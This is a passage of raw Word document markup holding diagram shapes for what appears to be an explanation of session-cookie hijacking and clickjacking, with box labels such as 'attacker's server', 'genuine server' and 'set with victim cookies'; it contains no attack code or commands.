                <v:shape id="Shape 1473" o:spid="_x0000_s1081" style="position:absolute;left:43817;top:6196;width:709;height:629;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="70941,6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rFwQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Ni8Iw&#10;EL0L+x/CLHjTdFVUqlFEkFU8LFa9D83Ylm0mJclq+++NIOxtHu9zluvW1OJOzleWFXwNExDEudUV&#10;Fwou591gDsIHZI21ZVLQkYf16qO3xFTbB5/onoVCxBD2KSooQ2hSKX1ekkE/tA1x5G7WGQwRukJq&#10;h48Ybmo5SpKpNFhxbCixoW1J+W/2ZxQk/jypvPs57i/Ha9d+d1NjDqhU/7PdLEAEasO/+O3e6zh/&#10;MhvD65t4glw9AQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsAAAAA&#10;AAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAJNtysXBAAAA3QAAAA8AAAAA&#10;AAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD1AgAAAAA=&#10;" path="m55266,l70941,62982,,47121,55266,xe" fillcolor="#4672c4" stroked="f" strokeweight="0">
                  <v:stroke endcap="round"/>
                  <v:path arrowok="t" textboxrect="0,0,70941,62982"/>
                </v:shape>
                <v:rect id="Rectangle 1474" o:spid="_x0000_s1082" style="position:absolute;left:41887;width:14083;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023DC55D" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="4672C4"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t xml:space="preserve">MATCH USER AND SESSION </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1475" o:spid="_x0000_s1083" style="position:absolute;left:44117;top:1117;width:8196;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3CDBC310" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="4672C4"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t xml:space="preserve">ID FROM TABLE </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 1478" o:spid="_x0000_s1084" style="position:absolute;left:27629;top:7395;width:18744;height:18050;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1874405,18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sixgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;EIXvhf6HZQq91Y1BtERXkUKLF4XGgh6H7JgNZmdDdtXYX985CL3N8N68981iNfhWXamPTWAD41EG&#10;irgKtuHawM/+8+0dVEzIFtvAZOBOEVbL56cFFjbc+JuuZaqVhHAs0IBLqSu0jpUjj3EUOmLRTqH3&#10;mGTta217vEm4b3WeZVPtsWFpcNjRh6PqXF68gUkey9nxt9y6zWV3OuxS7rvhy5jXl2E9B5VoSP/m&#10;x/XGCv5kJrjyjYygl38AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAaAbbIsYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" path="m,1805030r1874405,l1874405,,1699086,e" filled="f" strokecolor="red" strokeweight=".32161mm">
                  <v:stroke endcap="round"/>
                  <v:path arrowok="t" textboxrect="0,0,1874405,1805030"/>
                </v:shape>
                <v:shape id="Shape 1479" o:spid="_x0000_s1085" style="position:absolute;left:43904;top:6988;width:818;height:815;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WqxAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0L/odlhN7MprbUGl1FKtJCT8ZevI3ZMZs0Oxuy2xj/fbdQ8DaP9zmrzWAb0VPnK8cKHpMUBHHh&#10;dMWlgq/jfvoKwgdkjY1jUnAjD5v1eLTCTLsrH6jPQyliCPsMFZgQ2kxKXxiy6BPXEkfu4jqLIcKu&#10;lLrDawy3jZyl6Yu0WHFsMNjSm6HiO/+xCnb5Jb1t6/nneVbvT6E0T7u6f1fqYTJslyACDeEu/nd/&#10;6Dj/eb6Av2/iCXL9CwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAA6EharEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m81738,r,81506l,40753,81738,xe" fillcolor="red" stroked="f" strokeweight="0">
                  <v:stroke endcap="round"/>
                  <v:path arrowok="t" textboxrect="0,0,81738,81506"/>
                </v:shape>
                <v:shape id="Shape 49603" o:spid="_x0000_s1086" style="position:absolute;left:41136;top:23980;width:10473;height:1111;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1047259,1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6hxQAAAN4AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BawIx&#10;FITvgv8hPKG3mrUVqatRRChYKJbq7v25ee4ubl6WJGr675tCweMwM98wy3U0nbiR861lBZNxBoK4&#10;srrlWkFxfH9+A+EDssbOMin4IQ/r1XCwxFzbO3/T7RBqkSDsc1TQhNDnUvqqIYN+bHvi5J2tMxiS&#10;dLXUDu8Jbjr5kmUzabDltNBgT9uGqsvhahREedrHoixb3n98xrL4suS2U6WeRnGzABEohkf4v73T&#10;CqbzWfYKf3fSFZCrXwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDlUp6hxQAAAN4AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m,l1047259,r,111143l,111143,,e" stroked="f" strokeweight="0">
                  <v:stroke endcap="round"/>
                  <v:path arrowok="t" textboxrect="0,0,1047259,111143"/>
                </v:shape>
                <v:rect id="Rectangle 1481" o:spid="_x0000_s1087" style="position:absolute;left:41154;top:24142;width:13981;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35D22A42" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="3D64AC"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>SET /WITH VICTIM COOKIES</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 1482" o:spid="_x0000_s1088" style="position:absolute;left:24905;top:10677;width:15709;height:11593;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1570905,115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jbwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/fa8Iw&#10;EH4f+D+EE/Y2U6UMqcaighDYGNgN9PFozra2uZQmavffL4PB3u7j+3nrfLSduNPgG8cK5rMEBHHp&#10;TMOVgq/Pw8sShA/IBjvHpOCbPOSbydMaM+MefKR7ESoRQ9hnqKAOoc+k9GVNFv3M9cSRu7jBYohw&#10;qKQZ8BHDbScXSfIqLTYcG2rsaV9T2RY3q+Dt7NKdvur2QB/2pLFI391RK/U8HbcrEIHG8C/+c2sT&#10;56fLBfx+E0+Qmx8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAC2co28MAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m1570905,r,984507l,984507r,174809e" filled="f" strokecolor="red" strokeweight=".32161mm">
                  <v:stroke endcap="round"/>
                  <v:path arrowok="t" textboxrect="0,0,1570905,1159316"/>
                </v:shape>
                <v:shape id="Shape 1483" o:spid="_x0000_s1089" style="position:absolute;left:24496;top:22169;width:817;height:815;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="81738,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JnwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0L/odlBG+6qRYrqauIIhY8mfbS2zQ7ZpNmZ0N2jfHfu4WCt3m8z1lteluLjlpfOlbwMk1AEOdO&#10;l1wo+Po8TJYgfEDWWDsmBXfysFkPBytMtbvxmbosFCKGsE9RgQmhSaX0uSGLfuoa4shdXGsxRNgW&#10;Urd4i+G2lrMkWUiLJccGgw3tDOW/2dUq2GeX5L6t3k4/s+rwHQoz31fdUanxqN++gwjUh6f43/2h&#10;4/zX5Rz+voknyPUDAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAWrnCZ8MAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m,l81738,,40869,81506,,xe" fillcolor="red" stroked="f" strokeweight="0">
                  <v:stroke endcap="round"/>
                  <v:path arrowok="t" textboxrect="0,0,81738,81506"/>
                </v:shape>
                <v:shape id="Shape 1484" o:spid="_x0000_s1090" style="position:absolute;left:33977;top:19967;width:4970;height:1111;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="496977,1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AzwgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9LawIx&#10;EL4X/A9hBG8166OLrEZRsdJDD62K52Ez7i4mk7CJuv33plDobT6+5yxWnTXiTm1oHCsYDTMQxKXT&#10;DVcKTsf31xmIEJE1Gsek4IcCrJa9lwUW2j34m+6HWIkUwqFABXWMvpAylDVZDEPniRN3ca3FmGBb&#10;Sd3iI4VbI8dZlkuLDaeGGj1tayqvh5tVwMbvTyFuJub8mfv8bfcly81aqUG/W89BROriv/jP/aHT&#10;/OlsCr/fpBPk8gkAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBMHBAzwgAAAN0AAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m,l496977,r,111143l,111143,,xe" stroked="f" strokeweight="0">
                  <v:stroke endcap="round"/>
                  <v:path arrowok="t" textboxrect="0,0,496977,111143"/>
                </v:shape>
                <v:rect id="Rectangle 1485" o:spid="_x0000_s1091" style="position:absolute;left:33986;top:20127;width:6644;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10CFE5A4" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="3D64AC"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>AUTHORISED</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 1486" o:spid="_x0000_s1092" style="position:absolute;left:57986;top:27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091C5206" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7211CBEA" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:right="25"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC8BD08" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43089A79" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1AE122" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3BB2A3" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0340F687" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3E4E51" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Clickjacking </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674F58E2" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A11D6C0" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49687F3B" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2"/>
        <w:ind w:left="161"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7533C46A" wp14:editId="5E02FECE">
                <wp:extent cx="5083898" cy="2471279"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="40470" name="Group 40470"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5083898" cy="2471279"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5083898" cy="2471279"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="49608" name="Shape 49608"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4365321" y="1218310"/>
                            <a:ext cx="718577" cy="329496"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="718577" h="329496">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="718577" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="718577" y="329496"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="329496"/>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00" name="Shape 1500"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4365321" y="1218310"/>
                            <a:ext cx="718577" cy="329496"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="718577" h="329496">
                                <a:moveTo>
                                  <a:pt x="0" y="329496"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="718577" y="329496"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="718577" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="2906" cap="sq">
                            <a:miter lim="127000"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="1">
                            <a:srgbClr val="C8C8C8"/>
                          </a:lnRef>
                          <a:fillRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1503" name="Rectangle 1503"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4477875" y="1286207"/>
                            <a:ext cx="570191" cy="125975"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="2FA48BF3" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="FEFFFF"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>ATTACKER</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1505" name="Rectangle 1505"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4906032" y="1286207"/>
                            <a:ext cx="33715" cy="125975"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="60CB8B01" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="FEFFFF"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1507" name="Rectangle 1507"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4931381" y="1286207"/>
                            <a:ext cx="89480" cy="125975"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="59A9A3A0" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="FEFFFF"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t xml:space="preserve">S </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1509" name="Rectangle 1509"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4571162" y="1397591"/>
                            <a:ext cx="418563" cy="126369"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="33F5C328" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="FEFFFF"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>SERVER</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="49609" name="Shape 49609"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3533342" y="1218310"/>
                            <a:ext cx="718577" cy="329496"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="718577" h="329496">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="718577" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="718577" y="329496"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="329496"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="sq">
                            <a:miter lim="127000"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="4672C4"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1511" name="Shape 1511"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3533342" y="1218310"/>
                            <a:ext cx="718577" cy="329496"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="718577" h="329496">
                                <a:moveTo>
                                  <a:pt x="0" y="329496"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="718577" y="329496"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="718577" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="2906" cap="sq">
                            <a:miter lim="127000"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="1">
                            <a:srgbClr val="C8C8C8"/>
                          </a:lnRef>
                          <a:fillRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1514" name="Rectangle 1514"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3702552" y="1286207"/>
                            <a:ext cx="544163" cy="125975"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="7494FC57" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="FEFFFF"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t xml:space="preserve">GENUINE </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1516" name="Rectangle 1516"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3738042" y="1397591"/>
                            <a:ext cx="418563" cy="126369"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="596215F3" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="FEFFFF"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>SERVER</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
